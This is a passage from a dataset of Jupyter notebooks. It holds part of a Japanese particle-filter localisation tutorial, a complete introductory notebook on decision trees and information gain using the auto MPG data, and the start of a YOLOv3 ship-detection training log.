> sensor_max_angle or direction < sensor_min_angle:\n result = False\n\n # 雑音の大きさを設定\n # これは尤度計算に使う正規分布関数の分散になる\n sigma_d = distance * 0.1 # 10%の標準偏差\n sigma_f = math.pi * 3 / 180 # 3degの標準偏差\n\n # 雑音を混ぜる\n d = random.gauss(distance, sigma_d)\n f = random.gauss(direction, sigma_f)\n \n # 観測データを保存\n z = []\n z.append([d, f, sigma_d, sigma_f, result])\n \n return z",
"_____no_output_____"
]
],
[
[
"## パーティクルクラス \n下のグラフに描画されますが、青くていっぱいある矢印たちのことです。 \nロボットと同様に星を目印にしながら動きますが、重みwを持っていますwww \nロボットと観測結果が似ていると重みの値は大きくなり、大きいほど生き残る確率が高いです。 \nなので観測がうまくいっていれば、自然とロボットの位置に近いパーティクルたちだけになっていきます。 ",
"_____no_output_____"
]
],
[
[
"class Particle:\n def __init__(self, x, y, t, w):\n # パーティクルは位置姿勢と重みを持つ\n self.pos = [x, y, t]\n self.w = w\n \nclass Particles:\n # numはパーティクルの個数\n def __init__(self, x, y, t, num):\n self.particles = []\n for i in range(num):\n # とりあえず重みはみんな一緒\n self.particles.append(Particle(x, y, t, 1.0 / num))\n \n def move(self, fw, rot):\n # パーティクルを移動\n for i in self.particles:\n i.pos = Movement(i.pos, fw, rot)\n \n def observation(self, landmarks):\n # パーティクルからの観測データzを保存\n for i in self.particles:\n i.z = Observation(i.pos, landmarks)\n \n def likelihood(self, robot):\n for particle in self.particles:\n for i in range(len(particle.z)):\n \n # 各パーティクルの観測データをロボットのものと比較\n rd, rf, sigma_rd, sigma_rf, result_r = robot.z[i]\n pd, pf, sigma_pd, sigma_pf, result_p = particle.z[i]\n \n # ロボットとパーティクル共にresultがTrueになっていれば計算\n if result_r and result_p:\n # 尤度計算は正規分布の掛け合わせ\n # ロボットと観測データが近いパーティクルは尤度が高くなる\n likelihood_d = math.exp(-(rd - pd) ** 2 / (2 * (sigma_rd ** 2))) / (sigma_rd * math.sqrt(2 * math.pi))\n likelihood_f = math.exp(-(rf - pf) ** 2 / (2 * (sigma_rf ** 2))) / (sigma_rf * math.sqrt(2 * math.pi))\n # 尤度をパーティクルの重みとして保存\n particle.w *= likelihood_d * likelihood_f\n \n def resampling(self):\n num = len(self.particles)\n # 重みリストの作成\n ws = [e.w for e in self.particles]\n # 重みの大きいパーティクルほど高い確率で選ばれる\n ps = random.choices(self.particles, weights = ws, k = num)\n # 選ばれたパーティクルの位置、方向を引き継いで、再び均等な重みのパーティクルを作成\n self.particles = [Particle(*e.pos, 1.0 / num) for e in ps]\n \n # 矢印の描画に必要な位置と方向を計算して描画\n def draw(self, c = \"blue\", lbl = \"particles\"):\n xs = [p.pos[0] for p in self.particles]\n ys = [p.pos[1] for p in self.particles]\n vxs = [math.cos(p.pos[2]) for p in self.particles]\n vys = [math.sin(p.pos[2]) for p in self.particles]\n plt.quiver(xs, ys, vxs, vys, color = c, label = lbl, alpha = 0.7)",
"_____no_output_____"
]
],
[
[
"## ロボットクラス \n基本的な構造はパーティクルと変わりません。 \nわかりやすさのために位置を配列に保存して、軌跡を表示しています。 \n下のグラフを見るとわかると思います。 ",
"_____no_output_____"
]
],
[
[
"class Robot:\n def __init__(self, x, y, rad):\n # ステップごとにロボットの姿勢の真値が入った配列\n self.actual_poses = [[x,y,rad]]\n\n def move(self,fw,rot):\n # ロボットの位置を記録する(軌跡を残すために配列に入れてる)\n self.actual_poses.append(Movement(self.actual_poses[-1], fw, rot))\n \n def observation(self, landmarks):\n # 現在地から見た観測データの保存\n self.z = Observation(self.actual_poses[-1], landmarks)\n\n # 矢印の描画に必要な位置と方向を計算して描画\n def draw(self, sp):\n xs = [e[0] for e in self.actual_poses]\n ys = [e[1] for e in self.actual_poses]\n vxs = [math.cos(e[2]) for e in self.actual_poses]\n vys = [math.sin(e[2]) for e in self.actual_poses]\n plt.quiver(xs,ys,vxs,vys,color=\"red\",label=\"actual robot motion\")",
"_____no_output_____"
]
],
[
[
"## 描画関数 \nグラフの大きさなどを設定し、順に描画メソッドを実行させています。 ",
"_____no_output_____"
]
],
[
[
"def draw(i):\n # グラフの設定\n fig = plt.figure(i, figsize=(8,8))\n sp = fig.add_subplot(111,aspect='equal')\n sp.set_xlim(-1.0,1.0)\n sp.set_ylim(-0.5,1.5)\n \n # パーティクル、ロボット、ランドマークの描画\n particles.draw()\n robot.draw(sp)\n actual_landmarks.draw()\n \n plt.legend()",
"_____no_output_____"
]
],
[
[
"## シミュレーション開始 \nロボット、パーティクル、ランドマークの位置を指定し、シミュレーションを始めます。 ",
"_____no_output_____"
]
],
[
[
"# ロボット、パーティクル、ランドマークの配置と初期化\nrobot = Robot(0, 0, 0)\nparticles = Particles(0, 0, 0, 30)\nactual_landmarks = Landmarks([[-0.5,0.0],[0.5,0.0],[0.0,0.5]])\ndraw(0)\n\nfor i in range(1,18):\n # ロボットとパーティクルの移動\n robot.move(0.2,math.pi / 180.0 * 20)\n particles.move(0.2,math.pi / 180.0 * 20)\n \n # ロボットとパーティクルの観測\n robot.observation(actual_landmarks)\n particles.observation(actual_landmarks)\n \n # 尤度計算\n particles.likelihood(robot)\n \n # リサンプリング\n particles.resampling()\n \n # 描画\n draw(i)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb5333de4b32d0e5f0c36b569452b3612a66dd7e | 869,810 | ipynb | Jupyter Notebook | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | 12 | 2018-02-11T01:32:26.000Z | 2021-04-19T07:25:17.000Z | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | null | null | null | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | 8 | 2018-02-07T00:54:32.000Z | 2022-01-13T05:01:48.000Z | 908.892372 | 160,194 | 0.940389 | [
[
[
"# Introduction to Data Science\n## From correlation to supervised segmentation and tree-structured models\n\nSpring 2018 - Profs. Foster Provost and Josh Attenberg\n\nTeaching Assistant: Apostolos Filippas\n\n\n***",
"_____no_output_____"
],
[
"### Some general imports",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pylab as plt\nimport seaborn as sns\n\n%matplotlib inline\nsns.set(style='ticks', palette='Set2')",
"_____no_output_____"
]
],
[
[
"Recall the automobile MPG dataset from last week? Because its familiar, let's reuse it here.",
"_____no_output_____"
]
],
[
[
"url = \"http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data-original\"\ncolumn_names = ['mpg', 'cylinders', 'displacement', 'horsepower', 'weight', 'acceleration',\n 'model', 'origin', 'car_name']\n\nmpg_df = pd.read_csv(url,\n delim_whitespace=True,\n header=None,\n names=column_names).dropna()",
"_____no_output_____"
]
],
[
[
"Rather than attempt to predict the MPG from the other aspects of a car, let's try a simple classification problem, whether a car gets good milage (high MPG) or not",
"_____no_output_____"
]
],
[
[
"mpg_df[\"mpg\"].hist()",
"_____no_output_____"
]
],
[
[
"Arbitrarily, let's say that those cars with a MPG greater than the median get good miles per gallon. ",
"_____no_output_____"
]
],
[
[
"median_mpg = mpg_df[\"mpg\"].median()\nprint (\"the median MPG is: %s\" % median_mpg)\n\ndef is_high_mpg(mpg):\n return 1 if mpg > median_mpg else 0\n\nmpg_df[\"is_high_mpg\"] = mpg_df[\"mpg\"].apply(is_high_mpg)",
"the median MPG is: 22.75\n"
]
],
[
[
"We'd like to use information contained in the other automobile quantities to predict whether or not the car is efficient. Let's take a look at how well these observables \"split\" our data according to our target.",
"_____no_output_____"
]
],
[
[
"def visualize_split(df, target_column, info_column, color_one=\"red\", color_two=\"blue\"):\n plt.rcParams['figure.figsize'] = [15.0, 2.0]\n color = [\"red\" if x == 0 else \"blue\" for x in df[target_column]]\n plt.scatter(df[info_column], df[target_column], c=color, s=50)\n plt.xlabel(info_column)\n plt.ylabel(target_column)\n plt.show()\n \nvisualize_split(mpg_df, \"is_high_mpg\", \"weight\")",
"_____no_output_____"
]
],
[
[
"Above we see a scatter plot of all possible car weights and a color code that represents our target variable (is good mpg).\n- Blue dots correspond to fuel efficient cars, red dots are fuel inefficient cars\n- The horizontal position is the weight of the car\n- The vertical position separates our two classes\n\nClearly car weight and high MPG-ness are correlated.",
"_____no_output_____"
],
[
"Looks like cars weighing more than 3000 lbs tend to be inefficient. How effective is this decision boundary? Let's quantify it!",
"_____no_output_____"
],
[
"***\n\n\n**Entropy** ($H$) and **information gain** ($IG$) au useful tools for measuring the effectiveness of a split on the data. Entropy measures how random data is, information gain is a measure of the reduction in randomness after performing a split.\n\n<table style=\"border: 0px\">\n<tr style=\"border: 0px\">\n<td style=\"border: 0px\"><img src=\"images/dsfb_0304.png\" height=80% width=80%>\nFigure 3-4. Splitting the \"write-off\" sample into two segments, based on splitting the Balance attribute (account balance) at 50K.</td>\n<td style=\"border: 0px; width: 30px\"></td>\n<td style=\"border: 0px\"><img src=\"images/dsfb_0305.png\" height=75% width=75%>\nFigure 3-5. A classification tree split on the three-values Residence attribute.</td>\n</tr>\n</table>\n\nGiven the data, it is fairly straight forward to calculate both of these quantities.",
"_____no_output_____"
],
[
"##### Functions to get the entropy and IG",
"_____no_output_____"
]
],
[
[
"\ndef entropy(target_column):\n \"\"\"\n computes -sum_i p_i * log_2 (p_i) for each i\n \"\"\"\n # get the counts of each target value\n target_counts = target_column.value_counts().astype(float).values\n total = target_column.count()\n \n # compute probas\n probas = target_counts/total\n \n # p_i * log_2 (p_i)\n entropy_components = probas * np.log2(probas)\n # return negative sum\n return - entropy_components.sum()\n\ndef information_gain(df, info_column, target_column, threshold):\n \"\"\"\n computes H(target) - H(target | info > thresh) - H(target | info <= thresh)\n \"\"\"\n \n data_above_thresh = df[df[info_column] > threshold]\n data_below_thresh = df[df[info_column] <= threshold]\n \n H = entropy(df[target_column])\n entropy_above = entropy(data_above_thresh[target_column])\n entropy_below = entropy(data_below_thresh[target_column])\n \n ct_above = data_above_thresh.shape[0]\n ct_below = data_below_thresh.shape[0]\n \n tot = float(df.shape[0])\n \n \n return H - entropy_above*ct_above/tot - entropy_below*ct_below/tot ",
"_____no_output_____"
]
],
[
[
"Now that we have a way of calculating $H$ and $IG$, let's test our prior hunch, that using 3000 as a split on weight allows us to determine if a car is high MPG using $IG$.",
"_____no_output_____"
]
],
[
[
"\nthreshold = 3000\nprior_entropy = entropy(mpg_df[\"is_high_mpg\"])\nIG = information_gain(mpg_df, \"weight\", \"is_high_mpg\", threshold)\nprint (\"IG of %.4f using a threshold of %.2f given a prior entropy of %.4f\" % (IG, threshold, prior_entropy))\n",
"IG of 0.4632 using a threshold of 3000.00 given a prior entropy of 1.0000\n"
]
],
[
[
"How good was our guess of 3000? Let's loop through all possible splits on weight and see what is the best!",
"_____no_output_____"
]
],
[
[
"def best_threshold(df, info_column, target_column, criteria=information_gain):\n maximum_ig = 0\n maximum_threshold = 0\n\n for thresh in df[info_column]:\n IG = criteria(df, info_column, target_column, thresh)\n if IG > maximum_ig:\n maximum_ig = IG\n maximum_threshold = thresh\n \n return (maximum_threshold, maximum_ig)\n\nmaximum_threshold, maximum_ig = best_threshold(mpg_df, \"weight\", \"is_high_mpg\")\n\nprint (\"the maximum IG we can achieve splitting on weight is %.4f using a thresh of %.2f\" % (maximum_ig, maximum_threshold))",
"the maximum IG we can achieve splitting on weight is 0.5017 using a thresh of 2755.00\n"
]
],
[
[
"Other observed features may also give us a strong clue about the efficiency of cars.",
"_____no_output_____"
]
],
[
[
"predictor_cols = ['cylinders', 'displacement', 'horsepower', 'weight', 'acceleration', 'model', 'origin']\n\nfor col in predictor_cols:\n visualize_split(mpg_df, \"is_high_mpg\", col)",
"_____no_output_____"
]
],
[
[
"This now begs the question: what feature gives the most effective split? ",
"_____no_output_____"
]
],
[
[
"def best_split(df, info_columns, target_column, criteria=information_gain):\n maximum_ig = 0\n maximum_threshold = 0\n maximum_column = \"\"\n \n for info_column in info_columns:\n thresh, ig = best_threshold(df, info_column, target_column, criteria)\n \n if ig > maximum_ig:\n maximum_ig = ig\n maximum_threshold = thresh\n maximum_column = info_column\n\n return maximum_column, maximum_threshold, maximum_ig\n\nmaximum_column, maximum_threshold, maximum_ig = best_split(mpg_df, predictor_cols, \"is_high_mpg\")\n\nprint (\"The best column to split on is %s giving us a IG of %.4f using a thresh of %.2f\" % (maximum_column, maximum_ig, maximum_threshold))",
"the best column to split on is displacement giving us a IG of 0.5675 using a thresh of 183.00\n"
]
],
[
[
"### The Classifier Tree: Recursive Splitting",
"_____no_output_____"
],
[
"Of course, splitting the data one time sometimes isn't enough to make accurate categorical predictions. However, we can continue to split the data recursively until we achieve acceptable results. This recursive splitting is the basis for a \"decision tree classifier\" or \"classifier tree\", a popular and powerful class of machine learning algorithm. In particular, this specific algorithm is known as ID3 for Iterative Dichotomizer. \n\nWhat are some other ways you might consider splitting the data?",
"_____no_output_____"
]
],
[
[
"def Plot_Data(df, info_col_1, info_col_2, target_column, color1=\"red\", color2=\"blue\"):\n # Make the plot square\n plt.rcParams['figure.figsize'] = [12.0, 8.0]\n \n # Color\n color = [color1 if x == 0 else color2 for x in df[target_column]]\n \n # Plot and label\n plt.scatter(df[info_col_1], df[info_col_2], c=color, s=50)\n plt.xlabel(info_col_1)\n plt.ylabel(info_col_2)\n plt.xlim([min(df[info_col_1]) , max(df[info_col_1]) ])\n plt.ylim([min(df[info_col_2]) , max(df[info_col_2]) ])\n plt.show()\n\nplt.figure(figsize=[7,5])\nPlot_Data(mpg_df, \"acceleration\", \"weight\",\"is_high_mpg\")",
"_____no_output_____"
]
],
[
[
"Rather than build a classifier tree from scratch (think if you could now do this!) let's use sklearn's implementation which includes some additional functionality. ",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\n# Let's define the model (tree)\ndecision_tree = DecisionTreeClassifier(max_depth=1, criterion=\"entropy\") # Look at those 2 arguments !!! \n\n# Let's tell the model what is the data\ndecision_tree.fit(mpg_df[predictor_cols], mpg_df[\"is_high_mpg\"])",
"_____no_output_____"
]
],
[
[
"We now have a classifier tree, let's visualize the results!",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nfrom sklearn.tree import export_graphviz\n\ndef visualize_tree(decision_tree, feature_names, class_names, directory=\"./images\", name=\"tree\",proportion=True):\n \n # Export our decision tree to graphviz format\n dot_name = \"%s/%s.dot\" % (directory, name)\n dot_file = export_graphviz(decision_tree, out_file=dot_name,\n feature_names=feature_names, class_names=class_names,proportion=proportion)\n \n # Call graphviz to make an image file from our decision tree\n image_name = \"%s/%s.png\" % (directory, name)\n os.system(\"dot -Tpng %s -o %s\" % (dot_name, image_name))\n # to get this part to actually work, you may need to open a terminal window in Jupyter and run the following command \"sudo apt install graphviz\"\n \n # Return the .png image so we can see it\n return Image(filename=image_name)\n\nvisualize_tree(decision_tree, predictor_cols, [\"n\", \"y\"])",
"_____no_output_____"
]
],
[
[
"Let's look at the `\"acceleration\"`, `\"weight\"`, including the **DECISION SURFACE!!**\n\nMore details for this graph: [sklearn decision surface](http://scikit-learn.org/stable/auto_examples/tree/plot_iris.html)",
"_____no_output_____"
]
],
[
[
"def Decision_Surface(data, col1, col2, target, model, probabilities=False):\n # Get bounds\n x_min, x_max = data[col1].min(), data[col1].max()\n y_min, y_max = data[col2].min(), data[col2].max()\n \n # Create a mesh\n xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))\n meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])\n \n tdf = data[[col1, col2]]\n model.fit(tdf, target)\n if probabilities:\n Z = model.predict(meshed_data).reshape(xx.shape)\n else:\n Z = model.predict_proba(meshed_data)[:, 1].reshape(xx.shape)\n \n plt.figure(figsize=[12,7])\n plt.title(\"Decision surface\") \n plt.ylabel(col1)\n plt.xlabel(col2)\n \n if probabilities:\n # Color-scale on the contour (surface = separator)\n cs = plt.contourf(xx, yy, Z,cmap=plt.cm.coolwarm, alpha=0.4)\n else:\n # Only a curve/line on the contour (surface = separator)\n cs = plt.contourf(xx, yy, Z, levels=[-1,0,1],cmap=plt.cm.coolwarm, alpha=0.4)\n \n color = [\"blue\" if t == 0 else \"red\" for t in target]\n plt.scatter(data[col1], data[col2], color=color )\n plt.show() \n\ntree_depth=1\nDecision_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"is_high_mpg\"], DecisionTreeClassifier(max_depth=tree_depth, criterion=\"entropy\"), True)",
"_____no_output_____"
]
],
[
[
"How good is our model? Let's compute accuracy, the percent of times where we correctly identified that a car was high MPG.",
"_____no_output_____"
]
],
[
[
"from sklearn import metrics\nprint ( \"Accuracy = %.3f\" % (metrics.accuracy_score(decision_tree.predict(mpg_df[predictor_cols]), mpg_df[\"is_high_mpg\"])) )",
"Accuracy = 0.903\n"
]
],
[
[
"What are some other ways we could classify the data? Last class we used linear regression, let's take a look to see how that partitions the data",
"_____no_output_____"
]
],
[
[
"from sklearn import linear_model\nimport warnings\nwarnings.filterwarnings('ignore')\n\nDecision_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"is_high_mpg\"], linear_model.Lasso(alpha=0.01), True)\n",
"_____no_output_____"
]
],
[
[
"## Decision Tree Regression\n\nRecall our problem from last time, trying to predict the real-valued MPG for each car. In data science, problems where one tries to predict a real-valued number is known as regression. As with classification, much of the intuition for splitting data based on values of known observables applies:",
"_____no_output_____"
]
],
[
[
"from mpl_toolkits.mplot3d import Axes3D\ndef plot_regression_data(df, info_col_1, info_col_2, target_column):\n\n # Make the plot square\n plt.rcParams['figure.figsize'] = [12.0, 8.0]\n\n fig = plt.figure()\n ax = fig.gca(projection='3d')\n ax.plot_trisurf(df[info_col_1], df[info_col_2], df[target_column], cmap=plt.cm.viridis, linewidth=0.2)\n ax.set_xlabel(info_col_1)\n ax.set_ylabel(info_col_2)\n ax.set_zlabel(target_column);\n ax.view_init(60, 45)\n\n plt.show()\n\nplot_regression_data(mpg_df, \"acceleration\", \"weight\", \"mpg\")",
"_____no_output_____"
]
],
[
[
"At a high level, one could imagine splitting the data recursively, assigning an estimated MPG to each side of the split. On more thoughtful reflection, some questions emerge:\n- how do predict a real number at a leaf node given the examples that \"filter\" to that node?\n- how do we assess the effectiveness of a particular split? \n\nAs with decision tree classification, there are many valid answers to both of these questions. A typical approach involves collecting all nodes that filter to a leaf, computing the mean target value, and using this as a prediction. The effectiveness of a split can then be measured by computing the mean difference between all true values and this prediction.\n\nAs before, we can easily experiment with decison tree regression models using sklearn: ",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeRegressor\n\nregressor = DecisionTreeRegressor(max_depth=1, criterion=\"mse\") # note the use of mse (mean squared error) as a criterion\n\nregressor.fit(mpg_df[predictor_cols], mpg_df[\"mpg\"])",
"_____no_output_____"
],
[
"visualize_tree(regressor, predictor_cols, [\"n\", \"y\"])",
"_____no_output_____"
]
],
[
[
"As before, we can also view the \"regression surface\"",
"_____no_output_____"
]
],
[
[
"def Regression_Surface(data, col1, col2, target, model):\n # Get bounds\n x_min, x_max = data[col1].min(), data[col1].max()\n y_min, y_max = data[col2].min(), data[col2].max()\n \n # Create a mesh\n xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))\n meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])\n \n tdf = data[[col1, col2]]\n model.fit(tdf, target)\n Z = model.predict(meshed_data).reshape(xx.shape)\n\n \n plt.figure(figsize=[12,7])\n plt.title(\"Decision surface\") \n plt.ylabel(col1)\n plt.xlabel(col2)\n \n cs = plt.contourf(xx, yy, Z, alpha=0.4, cmap=plt.cm.coolwarm)\n\n plt.scatter(data[col1], data[col2], c=target, cmap=plt.cm.coolwarm)\n plt.show() \n\ntree_depth=1\nRegression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], DecisionTreeRegressor(max_depth=tree_depth, criterion=\"mse\"))",
"_____no_output_____"
]
],
[
[
"Let's also take a look using linear regression!",
"_____no_output_____"
]
],
[
[
"Regression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], linear_model.LinearRegression())",
"_____no_output_____"
]
],
[
[
"How about a more complicated model? Let's try random forrest regression!",
"_____no_output_____"
]
],
[
[
"from sklearn.ensemble import RandomForestRegressor\nRegression_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"mpg\"], RandomForestRegressor(n_estimators=10))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb533414b084bfdd3a925dc83704b80b57dc70bf | 867,142 | ipynb | Jupyter Notebook | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 1 | 2021-10-14T23:40:11.000Z | 2021-10-14T23:40:11.000Z | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 1 | 2021-01-09T08:00:30.000Z | 2021-01-09T08:00:30.000Z | Baseline_yolov3/train800_96.ipynb | JunHyungKang/SAROD_ICIP | 71585951f64dc1cc22ed72900eff81f747edec77 | [
"MIT"
] | 3 | 2021-01-07T11:27:46.000Z | 2021-01-31T04:03:07.000Z | 93.887181 | 288 | 0.568886 | [
[
[
"!python train96.py --epochs 1000 --batch_size 24 --model_def config/yolov3-custom96.cfg --data_config config/custom96.data --img_size 96",
"GPU device True\nNamespace(batch_size=24, checkpoint_interval=1, compute_map=False, data_config='config/custom96.data', epochs=1000, evaluation_interval=1, gradient_accumulations=2, img_size=96, model_def='config/yolov3-custom96.cfg', multiscale_training=True, n_cpu=8, pretrained_weights=None)\n \n---- [Epoch 0/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 15 | 30 | 60 |\n| loss | 5.318177 | 9.522597 | 27.183088 |\n| x | 0.057808 | 0.097499 | 0.077958 |\n| y | 0.067866 | 0.077317 | 0.063953 |\n| w | 0.999525 | 0.197551 | 0.134172 |\n| h | 0.334866 | 0.424033 | 0.199209 |\n| conf | 3.824442 | 8.681787 | 26.697584 |\n| cls | 0.033670 | 0.044411 | 0.010211 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.000000 | 0.000000 | 0.000000 |\n| recall75 | 0.000000 | 0.000000 | 0.000000 |\n| precision | 0.000000 | 0.000000 | 0.000000 |\n| conf_obj | 0.172566 | 0.222942 | 0.295796 |\n| conf_noobj | 0.019452 | 0.067396 | 0.218786 |\n+------------+--------------+--------------+--------------+\nTotal loss 42.02386474609375\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 44.65it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 182.83it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00000 |\n+-------+------------+---------+\n---- mAP 0.0\n \n---- [Epoch 1/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 15 | 30 | 60 |\n| loss | 3.473345 | 3.818047 | 9.194133 |\n| x | 0.110580 | 0.057297 | 0.078679 |\n| y | 0.098530 | 0.083381 | 0.072344 |\n| w | 0.735206 | 0.189965 | 0.527540 |\n| h | 0.225367 | 0.130042 | 0.165985 |\n| conf | 2.297500 | 3.320297 | 8.262206 |\n| cls | 0.006162 | 0.037065 | 0.087379 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.153846 | 0.428571 | 0.214286 |\n| recall75 | 0.000000 | 0.071429 | 0.071429 |\n| precision | 0.166667 | 0.093750 | 0.011407 |\n| conf_obj | 0.400156 | 0.389869 | 0.449144 |\n| conf_noobj | 0.009014 | 0.020010 | 0.069420 |\n+------------+--------------+--------------+--------------+\nTotal loss 16.485525131225586\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:02<00:00, 31.60it/s]\nComputing AP: 100%|███████████████████████████████| 1/1 [00:00<00:00, 89.68it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00009 |\n+-------+------------+---------+\n---- mAP 8.713263519231053e-05\n \n---- [Epoch 2/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 11 | 22 | 44 |\n| loss | 2.284829 | 2.501768 | 4.162377 |\n| x | 0.077931 | 0.074175 | 0.076291 |\n| y | 0.053745 | 0.082246 | 0.073930 |\n| w | 0.161168 | 0.046163 | 0.062310 |\n| h | 0.154466 | 0.225721 | 0.108232 |\n| conf | 1.829767 | 2.067030 | 3.805388 |\n| cls | 0.007751 | 0.006433 | 0.036227 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.363636 | 0.090909 | 0.454545 |\n| recall75 | 0.090909 | 0.090909 | 0.090909 |\n| precision | 0.363636 | 1.000000 | 0.064103 |\n| conf_obj | 0.434757 | 0.356718 | 0.445910 |\n| conf_noobj | 0.008006 | 0.009383 | 0.027810 |\n+------------+--------------+--------------+--------------+\nTotal loss 8.948973655700684\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 44.23it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 223.59it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00117 |\n+-------+------------+---------+\n---- mAP 0.0011681217675163997\n \n---- [Epoch 3/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 10 | 20 | 40 |\n| loss | 4.426109 | 4.191194 | 4.576394 |\n| x | 0.058745 | 0.076109 | 0.085991 |\n| y | 0.063266 | 0.079254 | 0.108918 |\n| w | 0.338564 | 0.127939 | 0.132152 |\n| h | 0.609314 | 0.726106 | 0.130827 |\n| conf | 3.353089 | 3.159993 | 4.032557 |\n| cls | 0.003131 | 0.021793 | 0.085948 |\n| cls_acc | 100.00% | 100.00% | 100.00% |\n| recall50 | 0.222222 | 0.285714 | 0.217391 |\n| recall75 | 0.000000 | 0.095238 | 0.043478 |\n| precision | 0.800000 | 0.214286 | 0.052632 |\n| conf_obj | 0.263703 | 0.317493 | 0.312342 |\n| conf_noobj | 0.006122 | 0.010345 | 0.020651 |\n+------------+--------------+--------------+--------------+\nTotal loss 13.193696975708008\n---- ETA 0:00:00\n\n---- Evaluating Model ----\nDetecting objects: 100%|████████████████████████| 82/82 [00:01<00:00, 51.45it/s]\nComputing AP: 100%|██████████████████████████████| 1/1 [00:00<00:00, 250.83it/s]\n+-------+------------+---------+\n| Index | Class name | AP |\n+-------+------------+---------+\n| 0 | ship | 0.00404 |\n+-------+------------+---------+\n---- mAP 0.0040403951110364504\n \n---- [Epoch 4/1000, Batch 28/29] ----\n+------------+--------------+--------------+--------------+\n| Metrics | YOLO Layer 0 | YOLO Layer 1 | YOLO Layer 2 |\n+------------+--------------+--------------+--------------+\n| grid_size | 11 | 22 | 44 |\n| loss | 3.378636 | 2.855823 | 3.273387 |\n| x | 0.061738 